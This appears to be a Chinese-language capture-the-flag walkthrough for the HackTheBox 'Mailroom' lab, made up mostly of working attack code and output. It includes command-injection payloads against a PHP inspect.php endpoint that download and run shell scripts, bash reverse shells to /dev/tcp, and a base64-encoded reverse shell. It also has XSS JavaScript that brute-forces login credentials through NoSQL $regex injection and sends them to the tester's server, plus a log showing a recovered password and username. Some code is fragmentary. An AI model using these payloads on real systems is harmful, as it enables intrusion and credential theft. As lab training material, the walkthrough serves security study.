root@mailroom:/tmp# df -h
Filesystem Size Used Avail Use% Mounted on
udev 1.9G 0 1.9G 0% /dev
tmpfs 391M 41M 350M 11% /run
/dev/mapper/ubuntu--vg-ubuntu--lv 7.2G 5.4G 1.5G 79% /
tmpfs 2.0G 0 2.0G 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 2.0G 0 2.0G 0% /sys/fs/cgroup
/dev/sda2 219M 108M 93M 54% /boot
overlay 7.2G 5.4G 1.5G 79% /var/lib/docker/overlay2/68f15147525c63cc344606e5b29fc4ec921f656f55260b4600bc178cb459378a/merged
overlay 7.2G 5.4G 1.5G 79% /var/lib/docker/overlay2/f029f39ea36301cfff86726028ab27e9734acd9199aee23fc6bae7334b411020/merged
shm 64M 1.1M 63M 2% /var/lib/docker/containers/a792a1685ae42e12a2e997b16ba6e2d3bd8eb2fb9009379ed9aea1b2f087881a/mounts/shm
shm 64M 0 64M 0% /var/lib/docker/containers/178ce6c64a6be27a55a5dbb37dde1d2786c6e610c78e36c911e159dee2573f1c/mounts/shm
overlay 7.2G 5.4G 1.5G 79% /var/lib/docker/overlay2/0bd824ad9f75604012958f36946a505389003d86fca4aeebafee5633ed3cf974/merged
shm 64M 0 64M 0% /var/lib/docker/containers/be13e7868b6371a6be9a28388202b131848556634f13b20060263e1571460ca3/mounts/shm
overlay 7.2G 5.4G 1.5G 79% /var/lib/docker/overlay2/15152d7d89f89bb8394707d53a1787872a40454a4d6b656724f11167ca53b6e5/merged
shm 64M 0 64M 0% /var/lib/docker/containers/ed9dafc5f146dd54611d8e00e4f8cf5a302418effcf64de39f628f9c50599600/mounts/shm
tmpfs 391M 0 391M 0% /run/user/1000
tmpfs 391M 0 391M 0% /run/user/0
tmpfs 391M 0 391M 0% /run/user/1001
root@mailroom:/tmp# free -m
total used free shared buff/cache available
Mem: 3901 600 1439 56 1860 2953
Swap: 2047 0 2047
root@mailroom:/tmp#
获取http://staff-review-panel.mailroom.htb/inspect.php源码:
docker cp containers_sites_1:/var/www/staffroom/inspect.php /home/
scp -P 40022 -o StrictHostKeyChecking=no /home/inspect.php [email protected]:/tmp/
删除了html代码后,如下:
;|&{}\(\)\[\]\'\"]/', '', $_POST['inquiry_id']);
$contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");
// Parse the data between and
$start = strpos($contents, '');
if ($start === false) {
// Data not found
$data = 'Inquiry contents parsing failed';
} else {
$end = strpos($contents, '
', $start);
$data = htmlspecialchars(substr($contents, $start + 21, $end - $start - 21));
}
}
$status_data = '';
if (isset($_POST['status_id'])) {
$inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['status_id']);
$contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");
// Parse the data between and
$start = strpos($contents, '');
if ($start === false) {
// Data not found
$status_data = 'Inquiry contents parsing failed';
} else {
$end = strpos($contents, '
', $start);
$status_data = htmlspecialchars(substr($contents, $start + 21, $end - $start - 21));
}
}
?>
有session效验,关键两句代码如下:
$inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['inquiry_id']);
$contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");
源视频里需要先curl下载文件到/tmp目录下,然后bash调用执行,我想了个笨办法,只需一步执行:
r0的内容是:
myip2=$( ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);
cat </tmp/r0.sh
id;
touch /tmp/XYZ;
setsid nc -lnvvp 10080&
bash -i >& /dev/tcp/$myip2/88 0>&1
EOF
cat /tmp/r0.sh;
`sleep 2``curl -o /tmp/AA5 http:///10.10.14.37:77/r0.sh``bash /tmp/AA5``echo 1`
curl -v -d "inquiry_id=\`sleep+2\`\`curl+-o+/tmp/1r2+http://10.10.14.37:77/r0.sh\`\`bash+/tmp/1r2\`\`echo+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" http://staff-review-panel.mailroom.htb/inspect.php
容器里的nc不支持-e选项,只能开一个正向telnet后门,无法建立反弹shell.
root@ed9dafc5f146:/var/www/html# which nc
/bin/nc
root@ed9dafc5f146:/var/www/html#
root@ed9dafc5f146:/var/www/html# nc -e
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit]
[-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
[destination] [port]
root@ed9dafc5f146:/var/www/html#
# nc 10.10.14.37 88 -e /bin/sh
由于没有过滤回车,我们还可以利用回车来进行多语句执行:
curl -v --data-binary "inquiry_id=\`sleep+12
curl+-o+/tmp/3r2+http://10.10.14.37:77/r0.sh
bash+/tmp/3r2
echo+-n+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php
如下方案反弹shell失败,原因不明:
提交参数:
` ``curl http://127.0.0.1:77/r2.sh`` `
# shell_exec("$inquiryId");
# 如上就可以
# 如下就不行
# shell_exec("cat $inquiryId");
curl -v -d "inquiry_id=\`+\`\`curl+http://10.10.14.37:77/r2.sh\`\`+\`" \
-H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php
r1.sh的内容是:
myip2=$(ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);
cat </tmp/r1.sh
bash -i >& /dev/tcp/$myip2/88 0>&1
EOF
cat /tmp/r1.sh;
r2.sh的内容是:
myip2=$(ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);
cat </tmp/r2.sh
bash -c {curl,http://$myip2:77/r1.sh}|bash
EOF
cat /tmp/r2.sh;
结合之前的回车换行 来运行多语句,想出来另外一个思路:
不需要写文件,直接多语句执行:
先在本地kali上生成r8.sh文件:
myip2=$(ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);
w2=`echo "bash -i >& /dev/tcp/$myip2/88 0>&1"|base64`
echo $w2;
echo $w2|base64 -d;
cat </tmp/r8.sh
bash -c {echo,$w2}|{base64,-d}|{bash,-i}
EOF
cat /tmp/r8.sh;
然后在ssh [email protected] 后发起curl请求:
curl -v -d "inquiry_id=../../../../proc/cpuinfo
\`+\`\`curl+http://10.10.14.50:30088/r8.sh\`\`+\`
touch+/tmp/" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php
成功反弹shell.
小技巧:
xss破解用户名和密码的时候,如何延迟超过30秒?
经过测试靶机里的火狐浏览器,没有阻止open函数弹窗,可以通过这个方法来延时,甚至可以多开很多浏览器页面,使用kali做反向代理连接互联网网站.
curl -v -d 'email=qax%40gmail.com&title=maga2023&message=' http://mailroom.htb/contact.php
更新php的index.php:
echo "/tmp/index.php ;
loader_user.js的源码:
function dateTimeToStringS(date, format) {
if (date) {
var o = {
"M+": date.getMonth() + 1, //
"d+": date.getDate(), //
"h+": date.getHours() % 12 == 0 ? 12 : date.getHours() % 12,
"H+": date.getHours(), //
"m+": date.getMinutes(), //
"s+": date.getSeconds(), //
"q+": Math.floor((date.getMonth() + 3) / 3),
"S": date.getMilliseconds() // ms
};
var week = {
"0": "\u65e5",
"1": "\u4e00",
"2": "\u4e8c",
"3": "\u4e09",
"4": "\u56db",
"5": "\u4e94",
"6": "\u516d"
};
if (/(y+)/.test(format)) {
format = format.replace(RegExp.$1, (date.getFullYear() + "").substr(4 - RegExp.$1.length));
}
if (/(E+)/.test(format)) {
format = format.replace(RegExp.$1, ((RegExp.$1.length > 1) ? (RegExp.$1.length > 2 ? "\u661f\u671f" : "\u5468") : "") + week[date.getDay() + ""]);
}
for (var k in o) {
if (new RegExp("(" + k + ")").test(format)) {
format = format.replace(RegExp.$1, (RegExp.$1.length == 1) ? (o[k]) : (("00" + o[k]).substr(("" + o[k]).length)));
}
}
return format;
}
}
window.onunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_unload_t="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S") );
}
window.onbeforeunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_beforeunload_t="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S") );
}
fetch("http://10.10.14.50:30088/guess_username.js?fetch_first_t="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S") );
setTimeout(function(){window.open("http://10.10.14.50:30088/loader_html.html?time="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S") );},10000);
setTimeout(function(){
opener=null;
open('','_self');
close();
},60000);
//driver.set_page_load_timeout(30); 30秒后就关闭了(python ai.py进程结束),等不到60秒
loader_html.html的源码如下:
guess_username
更新后的guess_username.js 源码:
/*
fetch("http://10.10.14.50:30088/xss.js?gu="+100*Math.random()).then(
(res3)=>{ var t2=res3.text();
t2.then( ( y3)=>
{
//console.log(y3);
eval( y3 ) ;
}
);
//console.log(res3,t2);
return t2; }
);
*/
async function callAuth(mail) {
var http = new XMLHttpRequest();
http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.onload = function () {
if (/"success":true/.test(this.responseText)) {
notify(mail);
cal("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~", mail);
}
};
http.send("email[$regex]=.*" + mail + "@mailroom.htb&password[$ne]=abc");
}
function notify(mail) {
fetch("http://10.10.14.50:30088/r8.sh?" + mail);
}
function cal(chars, mail) {
for (var i = 0; i < chars.length; i++) {
callAuth(chars[i] + mail)
}
}
var chars88 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~";
cal(chars88, "")
console.log("5201314_maga");
fetch("http://10.10.14.50:30088/guess_username.js?in_fetch_guest_username.js="+100*Math.random());
window.onunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_unload_ut="+100*Math.random());
}
window.onbeforeunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_beforeunload_ut="+100*Math.random() );
}
setTimeout(function(){
opener=null;
open('','_self');
close();
},60000);// 60秒后关闭,整个firefox-esr进程终结
[2023-05-03T12:03:31.693Z] "GET /loader_user.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[Wed May 3 12:03:31 2023] 10.10.11.209:39216 Accepted
[2023-05-03T12:03:31.861Z] "GET /guess_username.js?fetch_first_t=2023-05-03-12:03:30.634" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:41.920Z] "GET /loader_html.html?time=2023-05-03-12:03:40.638" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:42.036Z] "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:42.111Z] "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:43.195Z] "GET /guess_username.js?in_fetch_guest_username.js=32.70788844267638" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:43.572Z] "GET /guess_password.js?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:44.285Z] "GET /guess_password.js?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:45.954Z] "GET /guess_password.js?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:46.869Z] "GET /guess_password.js?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:48.451Z] "GET /guess_password.js?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:50.510Z] "GET /guess_password.js?69tris" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:52.582Z] "GET /r8.sh?n" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:53.417Z] "GET /guess_password.js?69trisR" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:55.632Z] "GET /r8.sh?an" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:57.588Z] "GET /guess_password.js?69trisRu" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:59.363Z] "GET /r8.sh?tan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:01.129Z] "GET /guess_password.js?69trisRul" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:02.564Z] "GET /r8.sh?stan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:04.469Z] "GET /guess_password.js?69trisRule" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:06.678Z] "GET /r8.sh?istan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:08.018Z] "GET /guess_password.js?69trisRulez" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:09.113Z] "GET /r8.sh?ristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:09.905Z] "GET /guess_password.js?69trisRulez!" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:11.824Z] "GET /r8.sh?tristan" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:04:13.160Z] "GET /favicon.ico" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[Wed May 3 12:05:31 2023] 10.10.11.209:39216 [200]: GET /?c=123
[Wed May 3 12:05:31 2023] 10.10.11.209:39216 Closing
目前git操作不熟:
root@3ae5bc817f72:/etc/apache2/sites-enabled# ls -al
total 8
drwxr-xr-x 1 root root 4096 Jan 17 19:56 .
drwxr-xr-x 1 root root 4096 Nov 15 04:17 ..
lrwxrwxrwx 1 root root 36 Jan 17 19:56 000-mailroom.conf -> ../sites-available/000-mailroom.conf
lrwxrwxrwx 1 root root 37 Jan 17 19:56 001-staffroom.conf -> ../sites-available/001-staffroom.conf
lrwxrwxrwx 1 root root 33 Jan 17 19:56 002-gitea.conf -> ../sites-available/002-gitea.conf
root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 000-mailroom.conf
ServerName mailroom.htb
# Block access to template directory
Require all denied
# Hide git directory
RedirectMatch 404 /\.git
# DocumentRoot
DocumentRoot /var/www/mailroom
root@3ae5bc817f72:/etc/apache2/sites-enabled#
root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 001-staffroom.conf
ServerName staff-review-panel.mailroom.htb
# Allow CORS
Header set Access-Control-Allow-Origin "*"
# Block connections from outside localhost
Allow from 127.0.0.1
Allow from 172.19.0.1
Deny from all
# Hide git directory
RedirectMatch 404 /\.git
# DocumentRoot
DocumentRoot /var/www/staffroom
root@3ae5bc817f72:/etc/apache2/sites-enabled#
root@3ae5bc817f72:/etc/apache2/sites-enabled#
root@3ae5bc817f72:/etc/apache2/sites-enabled# cat 002-gitea.conf
ServerName git.mailroom.htb
# Access to gitea docker
ProxyPass / http://gitea:3000/
ProxyPassReverse / http://gitea:3000/
root@3ae5bc817f72:/etc/apache2/sites-enabled#